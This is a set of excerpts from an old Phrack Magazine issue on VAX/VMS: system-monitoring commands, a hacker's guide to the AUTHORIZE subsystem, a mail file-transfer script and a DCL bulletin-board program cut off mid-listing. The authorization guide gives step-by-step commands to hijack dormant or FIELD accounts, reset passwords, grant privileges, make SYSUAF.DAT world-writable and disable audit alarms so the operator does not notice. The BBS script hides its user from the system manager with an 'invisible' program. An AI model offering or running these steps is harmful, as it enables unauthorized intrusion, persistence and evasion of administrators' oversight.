0 00:00:58.15 1168 90 31E00049 OPCOM HIB 7 8007 0 00:00:33.46 5506 305 31E0004A AUDIT_SERVER HIB 9 651 0 00:00:21.17 2267 22 31E0004B JOB_CONTROL HIB 10 1030 0 00:00:11.02 795 202 . . The SHOW SYSTEM command in this example shows all processes on all nodes of the cluster. 3. $ SHOW SYSTEM /NODE=NEON VAX/VMS V5.4 on node NEON 19-APR-1990 09:19:15.33 Uptime 0 02:29:07 Pid Process Name State Pri I/O CPU Page flts Ph. Mem 36200041 SWAPPER HIB 16 0 0 00:00:12.03 0 0 36200046 ERRFMT HIB 8 263 0 00:00:05.89 152 87 36200047 CACHE_SERVER CUR 16 9 0 00:00:00.26 80 51 36200048 CLUSTER_SERVER CUR 8 94 0 00:00:30.07 340 68 36200049 OPCOM HIB 6 2188 0 00:02:01.04 1999 177 3620004A AUDIT_SERVER HIB 10 346 0 00:00:10.42 1707 72 . . . The SHOW SYSTEM command in this example shows all processes on the node NEON. ----- X ----- So now that we beat the SHOW SYSTEM command to death, lets take on another command. Hmmm..let's see..Ahhhaaaa the MONITOR SYSTEM !!!!! This is a pretty neat command and one of my favorite "play" commands. Don't get me wrong, there's a lot to be learned from "play" commands like these. It really gives us some useful information. The reason why I like this utility is because it gives a GRAPHICAL representation of the data given by the SHOW SYSTEM. I would have included a short example of the graphics, but not everyone receiving this article would be running VMS on a terminal with ANSI emulation. So, if you want to see the ANSI graphics, follow my instructions... MONITOR Invokes the VMS Monitor Utility (MONITOR) to monitor classes of system-wide performance data at a specified interval. It produces three types of optional output: o Recording file o Statistical terminal display o Statistical summary file You can collect data from a running system or from a previously created recording file. You can execute a single MONITOR request, or enter MONITOR interactive mode to execute a series of requests. Interactive mode is entered when the MONITOR command is issued with no parameters or qualifiers. A MONITOR request can be terminated by pressing CTRL/C or CTRL/Z. CTRL/C causes MONITOR to enter interactive mode; CTRL/Z returns to DCL. The MONITOR Utility is described in detail in the VMS Monitor Utility Manual. Format: MONITOR class-name[,...] There are quite a few different options available for the MONITOR utility. We are not going to get into too much detail about each option, but I will take the time to discuss a few. The different options for MONITOR are.... ALL_CLASSES CLUSTER DECNET DISK DLOCK FCP FILE_SYSTEM_CACHE IO LOCK MODES MSCP_SERVER PAGE POOL PROCESSES RMS SCS STATES SYSTEM TRANSACTION VECTOR /BEGINNING /BY_NODE /COMMENT /DISPLAY /ENDING /FLUSH_INTERVAL /INPUT /INTERVAL /NODE /RECORD /SUMMARY /VIEWING_TIME /ALL /AVERAGE /CPU /CURRENT /FILE /ITEM /MAXIMUM MONITOR Parameter class-name[,...] Specifies one or more classes of performance data to be monitored. The available class-names are: ALL_CLASSES All MONITOR classes. CLUSTER Cluster wide information. DECNET DECnet-VAX statistics. DISK Disk I/O statistics. DLOCK Distributed lock management statistics FCP File system primitive statistics. FILE_SYSTEM_CACHE File system caching statistics. IO System I/O statistics. LOCK Lock management statistics. MODES Time spent in each of the processor modes. MSCP_SERVER MSCP Server statistics PAGE Page management statistics. POOL Space allocation in the nonpaged dynamic pool. PROCESSES Statistics on all processes. RMS VMS Record Management Services statistics SCS System communication services statistics. STATES Number of processes in each scheduler state. SYSTEM System statistics. TRANSACTION DECdtm services statistics. VECTOR Vector Processor scheduled usage. MONITOR /ALL Specifies that a table of current, average, minimum, and maximum statistics is to be included in display and summary output. /ALL is the default for all class-names except MODES, STATES and SYSTEM. It may not be used with the PROCESSES class-name. ---- X ---- Well, I hope this little file helps a few people out, by providing them with a better understanding of the background processes running on the system and by providing a better perception of the amount of CPU and I/O time taken by each process. DARTH VADER P.S : Look for a file on ACL (Access Control Listing) in the near future. ------------------------------------------------------------------------------ ---------------------------- VAX/VMS AUTHORIZATION SYSTEM ---------------------------- Introduction: ------------ Well, since Phrack issues containing VMS articles are pretty rare I will examine in deep the authorization sub-system on VAXes. Keep in mind that I will take under consideration that you are probably under some new VMS version (5.5-X). If you are on some older VMS, don't worry, commands are the same, just some flags and display was added on later versions. The knowledge of the authorization sub-system is of great importance for a VAX hacker since he must keep himself an access to the system, and this is the right way to do it. Also keep in mind that this is just a practical guide oriented to a hacker's needs and was done to be understandable by and useable by everybody, even those who are not so familiar with VMS. That's why I included some references to VMS filesystem, privileges, etc. AUTHORIZE: --------- The authorization subsystem is the one that will let you create accounts under the VMS operating system. The command you need to execute is the: SYS$SYSTEM:AUTHORIZE.EXE What do you need to execute that program ? READ/WRITE PRIVS over SYSUAF.DAT EXECUTE PRIVS over SYS$SYSTEM:AUTHORIZE.EXE How can you check if you got all needed to start creating accounts ? DIR SYS$SYSTEM:AUTHORIZE.EXE/FULL Directory SYS$SYSROOT:[SYSEXE] <----- Directory you are listing AUTHORIZE.EXE;1 File ID: (2491,5,0) Size: 164/165 Owner: [SYSTEM] <---- Owner is Sys Manager Created: 20-JUL-1990 08:30:34.18 <------- Creation Date of program Revised: 17-AUG-1992 09:45:36.31 (4) <------ Last modification over program Expires: <---- No expiration, will last for ever Backup: File organization: Sequential File attributes: Allocation: 165, Extend: 0, Global buffer count: 0 No version limit, Contiguous best try Record format: Fixed length 512 byte records <--- record organization Record attributes: None RMS attributes: None Journaling enabled: None File protection: System:RWED, Owner:RWED, Group:R, World: <---- (*) Access Cntrl List: None Total of 1 file, 164/165 blocks. (*) This is the field that will tell if you are authorized to execute the program. In this case if you own a privileged account you can run it. That doesn't mean that you will be able to view/modify any account found on the SYSUAF.DAT. But 95 % of the time any user can execute the AUTHORIZE program even if you don't have READ privilege on the SYS$SYSTEM directory. That means that if you do a : DIR SYS$SYSTEM and you find that you don't have the privilege to view the files contained in that directory you may still be able to execute the AUTHORIZATION subsystem, of course, you have a real low chance of getting the SYSUAF.DAT read or modified. If you find that the authorize program cannot be executed a good method is to send it UUENCODED from another VAX where you *DO* have at least read access to SYS$SYSTEM:AUTHORIZE.EXE . If you are working on the X-25's you can send it via PSI mailing. If you are on the Internet, just send it using the normal mail routing method to the user on the VAX you want the AUTHORIZE.EXE to get executed by. Once you get it just UUDECODE it and place it in your SYS$LOGIN directory and execute it!. The authorize will work as a module, and won't try to overlay any other module to make it work correctly. If you can run the authorize you should receive : "UAF>" prompt. THE SYSUAF.DAT: -------------- The SYSUAF.DAT is the most important file of the authorization subsystem. All the accounts are stored here with their : - PASSWORDS (encrypted) - ENVIRONMENT - DIR - privileges - RIGHTS OVER THE FILES ... and more The SYSUAF.DAT is somehow like the /etc/passwd file on Unix OS. Under UNIX you can take the password file and with an editor add yourself an account or modify an existing one without problem. Well this is not possible under VMS. You need a program that knows SYSUAF.DAT record structure (like AUTHORIZE) to take action over accounting system. The main difference is that the SYSUAF.DAT is not a PLAIN TEXT FILE, its a binary file structured to be read only by the AUTHORIZE program. Another main difference is that is not world readable, can usually be only read from high privileged accounts or from accounts which can override system protection flags (will talk about this later). The SYSUAF.DAT can be found in the same directory as the AUTHORIZE.EXE program, the SYS$SYSTEM. You will usually find a few versions of this file but normally with the same protections as the working one. What can be interesting is that you can usually find files produced by the output of the LIST command (under AUTHORIZE) which can be WORLD readable where you will have all the accounts listed with the OWNER/DIR/PRIVS..etc. That will help you a lot to try to hack some accounts if you still can't run authorize. Those files are called normally: SYSUAF.LIS, and you might find more than just one of them. Of course try to get the latest one since the older ones will contain some expired/deleted accounts. To check what privilege you have over the SYSUAF.DAT issue : DIR SYS$SYSTEM:SYSUAF.DAT/FULL Directory SYS$COMMON:[SYSEXE] SYSUAF.DAT;1 File ID: (228,1,0) Size: 183/183 Owner: [SYSTEM] Created: 20-JUL-1990 08:30:21.50 Revised: 14-JAN-1994 03:33:27.75 (34812) <--- Last Creation/Modification Expires: Backup: File organization: Indexed, Prolog: 3, Using 4 keys In 3 areas File attributes: Allocation: 183, Extend: 3, Maximum bucket size: 3 Global buffer count: 0, No version limit Contiguous best try Record format: Variable length, maximum 1412 bytes Record attributes: None RMS attributes: None Journaling enabled: None File protection: System:RWED, Owner:RWED, Group:R, World: (*) Access Cntrl List: None Total of 1 file, 183/183 blocks. In this case, if you are under a standard user account you won't be able to READ or/and WRITE the SYSUAF.DAT. So when you will execute the AUTHORIZE program, it will quit and kick you back to shell. IF you have World : R, you will be able to LIST/SHOW accounts. IF you have World : RW, you will be able to CREATE/MODIFY accounts. But if you happen to have SYSPRIV you will be able CREATE/MODIFY the SYSUAF.DAT at your pleasure! Since you can override the system protection that has been imposed over that file. Of course, if you have SETPRV privilege you have ALL privilege, and you can do whatever you want with the VAX. Privileges needed to CREATE/MODIFY accounts : Process privileges: *SETPRV may set any privilege bit Explanation: With this only you can assign yourself all the privileges you need with a SET PROC/PRIVS=ALL. *SYSPRV may access objects via system protection Explanation: If you have this one you will be able to read the SYSUAF.DAT. *BYPASS may bypass all object access controls Explanation: If you have this one you can read the SYSUAF.DAT since all the objects (ie:files) will be made accessible to you. I suggest that if you happen to have some problems, change the files access flags to let it be WORLD (you) readable/writable. So use : SET FILE/PROT=(w:rwed) SYS$SYSTEM:SYSUAF.DAT *READALL may read anything as the owner Explanation: Well this is obvious, SYSUAF.DAT will be read without problems but of course you won't be able to CREATE/MODIFY accounts to your pleasure. At least you can LIST/SHOW all the accounts as deep as you want. Entering AUTHORIZE: ------------------ Once you've executed AUTHORIZE you will receive its main prompt: RUN SYS$SYSTEM:AUTHORIZE UAF> UAF stands for User Authorization File. First of all you will first need to get a list of all the accounts on the system with some of their settings also. To do this issue the command: UAF>SHOW USERS/BRIEF Owner Username UIC Account Privs Pri Directory ALLIN1V24CREATED A1$XFER_IN [660,1] Normal 4 Disuser ALLIN1V24CREATED A1$XFER_OUT [660,2] Normal 4 Disuser JOHN_FAVORITE JFAVORITE [300,2] LEDGER Devour 4 DEV$DUA2 :[ABDURAHMAN] IBRAHIM ALBHIR ALBHIR [60,111] GOTVOT Normal 4 DUA2:[ALB HIR] ALGHAMDI ALGHAMDI [300,1] LEDGER Normal 4 DUA2:[ALG HAMDI] ALHAJAJ ALHAJAJ [325,3] BUDGET Devour 4 GOTDEV$DU A2 Explanation: 1) Owner: Owner of the account 2) Username: This is the guy's login name 3) UIC: User Identification Code. This serves to the OS to recognize you and rights you have over files, directory, etc. 4) Account: This is to let the operator know what the group is that owns/manages the account. 5) Pri: don't worry about it. 6) Directory: This is the account HOME directory. Where the owner of the account will work on. After you have captured the output of the SHOW command you can start trying to create yourself some accounts by modifying some already existing ones (which I suggest strongly). To create an account issue the following command : CREATE JOHN/DIR=JOHNS_DIR/DEVICE=SYS$USER/PASSWORD=JOHNS_PASSWORD /ACCESS=(DIALUP,NETWORK)/PRIVS=(NETMBX,TMPMBX)/DEFPRIVS=(NETMBX,TMPMBX) /ACCOUNT=USERS/OWNER=JOHN Effects of this command: Will create a user called JOHN which will log under the JOHNS_DIR directory, who will have just normal user privileges (TMPMBX/NETMBX) who, when listed, will appear to be as part of the group name USERS and the account's owner will be JOHN. After you issue this command a NEW UIC will be added to the RIGHTSLIST.DAT file being assigned to your user. Explanation: DIR: can be any directory name you saw on the system. Of course if you are not using all the privileges, check that its READ/WRITE-able so you won't have problems at login. DEVICE: is where the DIR can be found. That means that you have to tell in which physical/logical device that directory will be found. Since VAXes will have at least 1 or 2 magnetic supports you must say on which one the directory can be found. Normally they already have some logical names assigned like SYS$USER,SYS$SYSTEM,SYS$SPECIFIC,SYS$MANAGER, etc. PASSWORD: is the password you want for the account which will never be shown to anyone, so use whatever one you like. ACCESS: tells the system from where you will authorize logins for this account. For example I'm sure you've seen this message: Username: BACKUP Password: Cannot login from this source. Well this is the result of an account being setup with the DIALUP flags in the access field as NODIALUP. So if u want to give the account all kind of access just use : ACCESS=ALL and this will authorize all login sources for the account. PRIVS: will setup the privileges on the named account. If you just want it to be a normal user account use TMPMBX,NETMBX. If you want it to be a super-user account you can use ALL. But this is not the right way if you don't want your account to get discovered fast. Valid Process privileges: CMKRNL may change mode to kernel CMEXEC may change mode to exec SYSNAM may insert in system logical name table GRPNAM may insert in group logical name table ALLSPOOL may allocate spooled device DETACH may create detached processes DIAGNOSE may diagnose devices LOG_IO may do logical i/o GROUP may affect other processes in same group ACNT may suppress accounting messages PRMCEB may create permanent common event clusters PRMMBX may create permanent mailbox PSWAPM may change process swap mode ALTPRI may set any priority value SETPRV may set any privilege bit TMPMBX may create temporary mailbox WORLD may affect other processes in the world MOUNT may execute mount acp function OPER may perform operator functions EXQUOTA may exceed disk quota NETMBX may create network device VOLPRO may override volume protection PHY_IO may do physical i/o BUGCHK may make bug check log entries PRMGBL may create permanent global sections SYSGBL may create system wide global sections PFNMAP may map to specific physical pages SHMEM may create/delete objects in shared memory SYSPRV may access objects via system protection BYPASS may bypass all object access controls SYSLCK may lock system wide resources SHARE may assign channels to non-shared devices GRPPRV may access group objects via system protection READALL may read anything as the owner SECURITY may perform security functions Check the last section on tips on creating accounts. ACCOUNT: this is pretty useless and is just for displaying purposes at the SHOW USER under authorize. OWNER: This field is also used just at SHOW time but keep in mind to use an owner that won't catch the eye of the system manager. You can use the MODIFY command the ame as you used the CREATE. The only difference is that no account will be created but ALL types of modifications will affect the specified account. You can use the LIST command to produce an output of the accounts to a file. Use this command as you use the SHOW one. Of course, the authorize sub-system is so huge you can actually set hours of login for users, expirations, disk quotas, etc., but this is not the purpose of this article. Tips to create accounts: ----------------------- First of all, what I suggest strongly is to MODIFY accounts not to CREATE new ones. Why this? Well, new account names can jump out at the operator and he will kick you off the system very soon. The best way I think is to get a non-used account, change its privileges and change the password and use it!. First of all try to find a never-logged account or at least one account whose last log comes from few months ago. From the UAF prompt just do a SH USER/FULL and check out the dates that appear in the *Last Login* record. If this happens to be a very old one then it can be marked as valid to take control of. Of course you have to find a non used account since you will have to change the account's password. Check the flags field also. This flags can really bother you: Captive (worst one!) Ctly (ctrl-y deactivated) Restricted (OS does more checks than normal) DisUser (ACCOUNT IS NOT ENABLED!!!) I suggest you take out all the flag's fields. just issue: MODIFY JOHN/FLAGS=(NOCAPTIVE,NOCTLY,NORESTRICED,NODISUSER) If you find an account that is DisUser I suggest not to own it since the DisUser flags will take on when listing the accounts. If system manager sees an account that was OFF now ON..well it's a bit suspicious don't you think ? Check if the FIELD account is being used. If not own this one since it already has ALL privileges and will not look suspicious at all. Just change its password. (FIELD is the account normally used by Digital Engineers to check the VAX). Remember to check also that DIALUP access is permitted or you won't be able to login your account. Once you've chosen the perfect account you can now change its password. Issue: MODIFY JOHN/PASSWORD=MY_PASSWORD. (John is the account name you found) After you finished just type CTRL-Z and to exit. If you happen to logoff without exiting AUTHORIZE, don't worry. Changes to SYSUAF.DAT are done instantly when the command finishes its execution. One other advice, under SHELL if you happen to have SECURITY privilege Issue: SET AUDIT/ALARM/DISABLE=(AUTHORIZE) If you don't do this, each time you run AUTHORIZE, modified accounts will be logged into OPERATOR.LOG so remember to do so. After playing a bit with AUTHORIZE you won't have much problems understanding it. Hope you have PHUN! ;-) ------------------------------------------------------------------------------ $ ! FACILITY: Mailback (MAILBACK.COM) $ ! $ ! ABSTRACT: VAXVMS to VAXVMS file transfer, using the VAX/PSI_MAIL $ ! utility of VAXPSI, over an X.25 link. $ ! $ ! ENVIRONMENT: VAX/VMS operating system. $ ! $! ------------------------------------------------------------------- $ saved_verify := 'f$verify(0)' $ set noon $ ws = "write sys$output" $ ws "" $ ws " MAILBACK transfer utility V1.0 (via Backup and PSI_Mail) 21-May-1990" $ ws "" $! $ if f$logical("debug").nes."" then set verify $ ask_p1: $ if P1.eqs."" then read/prompt="MailBack> Send or Receive (S/R) : " - sys$command P1 $ P1 = f$edit(P1, "UPCASE,COMPRESS,TRIM") $! $! $ if P1.EQS."" then exit 1+0*f$verify(saved_verify) $ if P1.EQS."R" then goto receive_file $ if P1.nes."S" then goto ask_P1 $! ------------------------------------------------------------------- $! $! Sending File(s) $! =============== $ if P2.eqs. "" then - read/prompt="MailBack> Recipient mail address (PSI%nnn::user) : " - sys$command P2 $ if P2.eqs."" then exit 1+0*f$verify(saved_verify) $! $! $ if P3.eqs."" then read/prompt="MailBack> File(s) : " sys$command P3 $! $ ws "MailBack> ... Backuping the file(s) ..." $ Backup/nolog 'P3' sys$scratch:mailbck.tmp/sav/block=2048 $! $ ws "MailBack> ... Converting format ..." $ convert/fdl=sys$input sys$scratch:mailbck.tmp sys$scratch:mailbck.tmp record carriage_control carriage_return $! $ ws "MailBack> ... Sending a (PSI_)mail ..." $ on warning then goto error_sending $ mail/subject="MAILBACK Backup-File" - /noself sys$scratch:mailbck.tmp 'P2' $ ws "MailBack> ... SEND command SUCCESSfully completed." $! $ fin_send: $ delete = "delete" $ delete/nolog/noconfirm sys$scratch:mailbck.tmp;,; $ exit 1+0*f$verify(saved_verify) $! $ Error_sending: $ ws "MailBack> Error detected while sending the mail ; ..." $ ws "MailBack> ... Fix the problem, then retry the whole procedure." $ goto fin_send $! ------------------------------------------------------------------- $! $! Inbound File(s) Processing $! ========================== $receive_file: $! $ if P2.eqs."" then - read/prompt="MailBack> Destination directory (= []) : " sys$command P2 $ if P2.eqs."" then p2 ="[]" $! $! $! $ if P3.eqs."" then - read/prompt="MailBack> Mail file (= default mail file) : " - sys$command P3 $ gosub build_file $ ws "MailBack> ... Extracting a (PSI_)mail from the NEWMAIL folder ..." $ define/exec sys$output nl: ! ped 18-May-90 (wipe out mail displays) $ if P3.eqs."" then goto normal_get $ define/nolog new_mail_file 'p3' $ define/user sys$command sys$input $ set message/nofacility/noseverity/notext/noident $ mail set file new_mail_file select NEWMAIL sear MAILBACK Backup-File extract/NOHEADER out_file $ deassign new_mail_file $ goto clean $ if P3.nes."" then p2 ="[]" $! $! $ normal_get: $ define/user sys$command sys$input $ set message/nofacility/noseverity/notext/noident $ mail select NEWMAIL sear MAILBACK Backup-File extract/NOHEADER out_file $! $ clean: $ deassign sys$output ! $ set message/facility/severity/text/ident $ if f$search("out_file") .eqs. "" then goto nomessage $ on warning then goto error_conv $ ws "MailBack> ... Converting format ..." $ convert/fdl=sys$input out_file out_file /pad=%x00 record format fixed carriage_control none size 2048 $! $ ws "MailBack> ... Restoring file(s) from the backup saveset ..." $ on warning then goto error_back $ backup/nolog out_file/save 'P2'*.* $! $ delete = "delete" $ delete/nolog/noconfirm 'file';,; $ ws "MailBack> ... RECEIVE command SUCCESSfully completed." $! $ finish_r: $ deassign out_file $ exit 1+0*f$verify(saved_verify) $! ------------------------------------------------------------------- $ error_conv: $ ws "MailBack> " + - "An error occurred during the fdl convert of the extracted mail ;" $ ws "MailBack> ... the file ''file' corresponds to " + - $ ws "MailBack> ... the message extracted from Mail." $ goto finish_r $! $ error_back: $ ws "MailBack> An error occurred during the file restore phase with BACKUP ;" $ ws "MailBack> ... the file ''file' corresponds to " $ ws "MailBack> " + - "... the message extracted from Mail, converted as a backup Saveset." $ delete/nolog/noconfirm 'file';-1 $ goto finish_r $! $ nomessage: $ ws "MailBack> No mail message has been found in the NEWMAIL folder." $ goto finish_r $! $Build_file: ! Build a unique (temporary) file_name $file = "sys$scratch:mail_" + f$cvtime(f$time(),,"month")+ - f$cvtime(f$time(),,"day") + f$cvtime(f$time(),,"hour")+ - f$cvtime(f$time(),,"minute")+ f$cvtime(f$time(),,"second") + ".tmp" $define/nolog out_file 'file' $return ==Phrack Magazine== Volume Five, Issue Forty-Five, File 16 of 28 **************************************************************************** DCL BBS PROGRAM -------cut here-------cut here------cut here------cut here------cut here------ $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ ! Well, this is just a little bbs program, a skeleton on wich u can work, ! $ ! add stuff, subroutines, and so on. ! $ ! I am SURE there are bugs, anyway the only I use to know 'till now is in ! $ ! the editor, where anything u write after a "!" will not be saved ! $ ! If sumbody wants to help/cooperate/exchange ideas about this program and/or! $ ! any Dcl stuff/trick, just write at: ! $ ! SSGRR@pol88a.polito.it for internet e-mail ! $ ! (0) 22221122878::SSGRR for PSI MAIL ! $ ! Mbx RAOUL on Qsd chat system, x.25 nua (0) 208057040540 ! $ ! ANY kind of help and suggestion will be accepted ! ! $ ! ANY kind of cooperation with SERIOUS italian and/or european hackers, ! $ ! especially concerning x.25 networks, vax/vms, unix, cisco systems will be ! $ ! appreciated. ! $ ! ! $ ! Raoul / SferraNet Inc. for Phrack Magazine ! $ ! Many thanks to: Nobody. I usually work on my own. ! $ ! ! $ ! ! $ ! Remember to add the files the program requires, such as: ! $ ! INVI.EXE ! $ ! goodbye.txt ! $ ! files.txt ! $ ! etc..... ! $ ! And remember to create the subdirectories the program requires, AND to ! $ ! create a [bbs] directory, otherwise to rename [bbs] string, in this ! $ ! program, to a different name. ! $ ! ! $ ! I am sorry if program documentation is poor, but this program is mainly ! $ ! intended as a skeleton for future developments. ! $ ! I swear next time it will came up with a installation.com file :) ! $ ! ! $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $! BBS PROGRAM RELEASE 2.0 $! ADDED CALL FUNCTION TO SPEED UP PROCESSES $! LAST MODIFIED ON 15/10/1993 BY RAOUL/SFERRANET $! BBS PROGRAM $! Coded By Raoul/SferraNet $! $! Featuring: $! Internal Mbx option $! Kermit (Vms default) and Zmodem download protocols options $! internal editor $! password change option $! logs of dtes, calls source etc $! "post a banner" option $ ! "BBS" account requires: $ ! Privileges: NETMBX, TMPMBX, CMKRNL $ ! Defprivileges: NETMBX, TMPMBX, CMKRNL $ ! Flags: disnewmail, disctly, restricted $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ !This next 3 lines put away error messages ( remove it when testing the $ !program, so that you will be able to see wich errors you are getting $ set messa /nofac $ set messa /notext $ set messa /nosev $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ ! Defines CLS $ ESC[0,8] = 27 $ CLC == ESC+"[H"+ESC+"[J" $ cls := "write sys$output CLC" $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $!define user's terminal $ ! here we check what kind of terminal user has, knowing that for Vms $ ! a good graphic mode will be from VT100 on, using this list: $ ! unknown = 0 $ ! VT52 = 64 $ ! VT100 = 96 $ ! VT101 = 97 $ ! VT102 = 98 $ ! VT105 = 99 $ ! VT125 = 100 $ ! VT200 = 110 $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ cls $ write sys$output " Checking Terminal Type....Please Wait...." $ set terminal /inquire $ ttype = f$getdvi("SYS$COMMAND", "DEVTYPE") $ if ttype .ge. 96 $ then $ vt100_flag = 1 $ else $ vt100_flag = 0 $ endif $! $ if vt100_flag .eq. 1 $ then $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $! This is a list of escape sequences definitions $ reverse == ESC+"[7m" ! turns on inverse video attribute $ blink == ESC+"[5m" ! turns on blinking attribute $ blankfromtop == ESC+"[1J" ! blanks screen from top to cursor $ blankline == ESC+"[2K" ! blanks current line $ blankendline == ESC+"[0K" ! blanks from cursor to end of line $ normal == ESC+"[0m" ! Resets to normal video attribute $ bold == ESC+"[1m" ! turns on Bold attribute $ underline == ESC+"[4m" ! turns on underline attribute $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ write sys$output reverse $ write sys$output blink $ write sys$output " Your Terminal Is DEC-VTxxx Series Compatible ! " $ write sys$output " This Will Help You To Get even MORE&MORE From This Bbs ! " $ write sys$output normal $ wait 0:00:03 $ else $ write sys$output " Sorry, Your Terminal Isn't DEC-VTxxx Series Compatible " $ write sys$output " " $ write sys$output " Try to Get a Better Emulation Next Time Dude!!! " $ wait 0:00:05 $ cls $ endif $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $! USER.COM VERSION 1.0 BETA $ on error then goto nouser $ on severe_error then goto nouser $ in := "inquire /nopunctuation" $ out := "write sys$output" $ user: $ cls $ out " " $ out " ** Sferra Bbs Logon ** (C) 1993 Raoul / SferraNet Inc. " $ out " " $ in usr "Username: " $ if usr .eqs. "" then goto user $ if usr .eqs. " " then goto user $ open /read mailfile [bbs]'usr'.mail /error=nouser $ set term/noecho $ in pass "Password: " $ set term/echo $ read mailfile pw $ close mailfile $ if pw .eqs. pass then goto bbs $ out " " $ out "Wrong Password." $ wrong: $ out " " $ in test "Retry or Login as a New User ? (R/N) " $ if test .eqs. "N" then goto newusr $ cls $ goto user $ goto bbs $ nouser: $ out " " $ out " User ''usr' Not Found In Users File " $ out " " $ wait 0:00:02 $ goto wrong $!% author Raoul/SferraNet $!% language DCL $! Bbs program for Vax/Vms $! $ bbs: $ cls $ type [bbs]welcome.txt $ wait 00:00:04 $ user == usr $ tt == f$getdvi("TT","DEVNAM")!-"-" $! l1 == f$locate(":",TT) $! l1 == l1 -1 $ device == tt $ start == f$cvtime(,,"time") $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ ! Here we show user bbs in full mode, to get his/her dte, inet address or $ ! Decnet node, and put it in a file, then we run invisible.exe to $ ! make the user "BBS" invisible $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ sh u bbs /f /out=[bbs]'user'.dte $ open/append output_file [bbs]users.dat $ write output_file "Bbs Users Log on: ",F$time() $ write output_file "User: ''user' connected on ''device' at ''start'" $ close output_file $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $! Here we run INVI.EXE, to get invisible at a sh users command, and to avoid $! System Manager to detect the bbs user $ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $ run [bbs]invi.exe;1 $ errcheck: $ on control_p then goto mainmenu $ on control_y then goto mainmenu $ on control_t then goto mainmenu $ on control_c then goto mainmenu $ on error then goto mainmenu $ on severe_error then goto mainmenu $ on warning then goto mainmenu $ write sys$output " " $ out reverse $ write sys$output " Welcome To " $ out normal $ write sys$output " " $ out blink $ write sys$output " Running on a Vax/Vms " $ out normal $ write sys$output " " $ out reverse $ write sys$output " You are connected on line ''device' at ''start' " $ out normal $ write sys$output " " $ out blink $ write sys$output " Please Wait... " $ out normal $ wait 0:00:05 $ cls $ write sys$output " User ''user' connected on ''device' at ''start' " $ write sys$output " " $ out reverse $ write sys$output " PLEASE POST ME A MESSAGE " $ out normal $ write sys$output " " $ write sys$output " IF U FIND ANY BUGS OR HAVE ANY SUGGESTION" $ wait 0:00:02 $ cls $ write sys$output " " $ write sys$output " *** Banner Message *** Read it or Die ! *** " $ write sys$output " " $ type [bbs]banner.txt $ write sys$output " " $ inquire /nopunct banner "Press [ENTER] To Continue..." $ mainmenu: $ cls $ write sys$output " " $ write sys$output " HackTown Bbs " $ write sys$output " " $ write sys$output " Main Menu " $ write sys$output " " $ write sys$output " " $ write sys$output " " $ write sys$output " " $ write sys$output " [F] Files Area " $ write sys$output " [M] Mailboxes Area " $ write sys$output " [I] Informations About This System " $ write sys$output " [B] Leave a Banner $ write sys$output " [U] List Users " $ write sys$output " [P] Post a Message To SysOp " $ write sys$output " [L] Logout " $ write sys$output " " $ write sys$output " " $ inquire topmenu "(F,M,I,B,P,L)==>" $ if topmenu .eqs. "L" then goto L $ if topmenu .eqs. "F" then goto F $ if topmenu .eqs. "I" then goto I $ if topmenu .eqs. "P" then goto P $ if topmenu .eqs. "M" then goto M $ if topmenu .eqs. "U" then goto U $ if topmenu .eqs. "B" then goto B $ if topmenu .eqs. "" then goto mainmenu $ if topmenu .eqs. " " then goto mainmenu $ goto mainmenu $! Banner Message $ B: $ cls $ write sys$output " Editing Banner! End With a Dot (.) " $ write sys$output " Notice: Pirating or Incorrects Messages Will Be " $ write sys$output " Accepted...Don't Be Clean! ;) " $ write sys$output " $ del [bbs]banner.txt;* /nolog $ open/write banner_file [bbs]banner.txt $ write banner_file " Banner Message From user ''usr' Posted at ''start' " $ write banner_file " " $ write banner_file "***********************************************************" $ line=1 $ more: $ inquire /nopunctu text "''line': " $ if text .eqs. "." then goto endbanner $ write banner_file text $ line=line+1 $ goto more $ write banner_file "***********************************************************" $ close banner_file $ write sys$output " " $ write sys$output " Banner Saved! " $ wait 0:00:02 $ goto mainmenu $! $ U: $ cls $ type [bbs]users.lis $ write sys$output " " $ write sys$output " " $ inquire /nopunctuation komodo " Press [ENTER] To Continue..." $ goto mainmenu $! $ L: $ goto bbsbye $ logout/full $! $! $! option F $! $ F: $ write sys$output " " $ write sys$output " " $ cls $ write sys$output " " $ write sys$output " Files Menu " $ write sys$output " " $ write sys$output " [1] List files " $ write sys$output " [2] Type a file " $ write sys$output " [3] Download a file " $ write sys$output " [4] Upload a file " $ write sys$output " [5] Go back to main menu " $ inquire files "(1,2,3,4,5)==>" $ if files .eqs. "1" then goto 1 $ if files .eqs. "2" then goto 2 $ if files .eqs. "3" then goto 3 $ if files .eqs. "4" then goto 4 $ if files .eqs. "5" then goto 5 $ if files .eqs. "" then goto F $ if files .eqs. " " then goto F $ goto F $! $ 1: $ goto fileslist $ inquire/nopunct tasto "Press [ENTER] to continue..." $ goto F $! $ 2: $ 